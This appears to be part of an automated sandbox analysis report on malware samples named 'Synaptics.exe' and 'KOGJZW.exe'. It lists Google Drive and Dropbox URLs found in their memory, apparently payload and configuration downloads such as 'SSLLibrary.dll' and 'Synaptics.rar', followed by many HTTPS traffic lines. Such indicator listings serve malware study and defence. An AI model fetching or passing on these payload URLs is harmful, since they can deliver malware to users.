Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrl(//
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads?
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1:C
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt5
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd1
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd2A
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:77
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduD
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaducati
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadur
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvd#:
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvea4
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvnNB
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwnlo
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxe
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady)
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady5
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz:_:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~3
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~C
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~g
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: KOGJZW.exe	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.1)
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.goog:
Source: Synaptics.exe, 00000003.00000002.1772723039.000000000E238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/#
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/1
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/PIZfSVlVsOGlEVGxuZVk&export=download;
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/PIZfSVlVsOGlEVGxuZVk&export=downloadw
Source: Synaptics.exe, 00000003.00000002.1772723039.000000000E206000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1771384181.000000000E18A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1772723039.000000000E20A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.0000000007135000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1771384181.000000000E185000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$L
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgv
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle5
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmp
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadptA
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadur
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadymFR
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadymFR$
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
Source: Synaptics.exe, 00000003.00000002.1744350612.0000000007135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontlV
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: KOGJZW.exe	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: KOGJZW.exe	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
Source: KOGJZW.exe	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
